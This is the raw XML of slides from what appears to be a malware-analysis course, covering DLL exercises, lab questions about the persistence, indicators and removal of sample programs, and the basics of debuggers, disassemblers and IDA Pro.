            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>Kernel32.dll</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="704" name="Google Shape;1316;p141" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4644000" y="2709000"/>
            <a:ext cx="4314600" cy="3800160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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5"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DLL Practice</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="706"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Write an DLL allows users to call a function for printing a list of process to screen</a:t>
            </a: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7"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Practice [Lab07]</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="708"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Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>PE files:</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Lab07-01.exe</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Questions</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Check persistent running of the program (when rebooting)?</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Why does the program use a mutex?</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Host-based/Network-based indicators?</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What is the purpose of the program?</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When will it finish executing?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-107640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>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Practice [Lab07]</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="710"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Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>PE file</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Lab07-02.exe</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Questions</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How does this program achieve persistence?</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What is the purpose of this program?</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When will this program finish executing?</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Practice [Lab07]</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="712"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Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>PE file: Lab07-03.exe + Lab07-03.dll</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Questions</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How does this program achieve persistence?</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What are two good host-based signatures for this malware?</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What is the purpose of this program?</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How could you remove this malware once it is installed?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-107640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>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3"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Disassembler vs. Debugger</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="88000"/>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Debugger: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>designed to run code</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Source-level debugger</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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usually built into integrated development environments (IDEs)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Assembly-level debugger</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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operate on assembly code instead of source code</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Commonly used</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="1600200" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>WinDbg: kernel and user debugging</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="1600200" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ff0000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>OllyDbg</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: user debugging</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="1600200" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>IDA Pro: user debugging &amp; disassembly</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Disassembler: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>is not interested in running code</a:t>
            </a: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Disassembler</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="716"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Two main types</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Linear sweep: windbg</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Recursive descent: IDA Pro</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Output is generally a disassembly listing</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Can yield extremely large text files</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Difficult to navigate/change</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Disassembly fails to reveal obfuscated code</a:t>
            </a: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Debugger</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="718" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="65000"/>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Using a debugger</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Single-Stepping</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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run a single instruction and then return control to the debugger. The debugger stops after every instruction.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Stepping-over</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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step-over = bypass</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Stepping-Into</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Go into the first instruction</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Breakpoint</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Software breakpoint: stop at a particular instruction</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Hardware breakpoint: stop at a location (address)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Conditional breakpoint: a software breakpoint that will only if a certain condition is true</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IDA Pro</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="720"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Developed by Ilfak Guilfanov</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Professional disassembler</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Fast and interactive</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IDA Pro Free and license</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Add comments, label data, name function …. </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Save to *.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>idb</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Plug-in</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-107640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="721" name="Google Shape;1367;p149" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276000" y="4149000"/>
            <a:ext cx="5883840" cy="2701080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="722" name="Google Shape;1368;p149" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6876360" y="0"/>
            <a:ext cx="2243160" cy="110412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Security reports</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134"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Banking malware</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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2018: 830 135 users attacked (steal money from bank accounts on the computers)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="135" name="Google Shape;197;p15" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1545120" y="2533320"/>
            <a:ext cx="6122880" cy="3540600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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3"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IDA Pro</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="724" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="73000"/>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Disassembly Windows</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Text – mode</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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GUI with arrow (solid, dashed, facing up/down, …)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="556"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Other Windows</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Hex View</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Functions</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: all functions with length and flags (R, F, L, S, etc.)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Names</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: every addresses with a name (functions, name coded, named data, strings)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Strings</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: all strings</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Imports</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: all imports</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Exports</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: all exports</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Structures</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: layout of all active data structures</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Enums: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>all enumerated data type</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-120960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="519"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-120960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="519"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-120960">
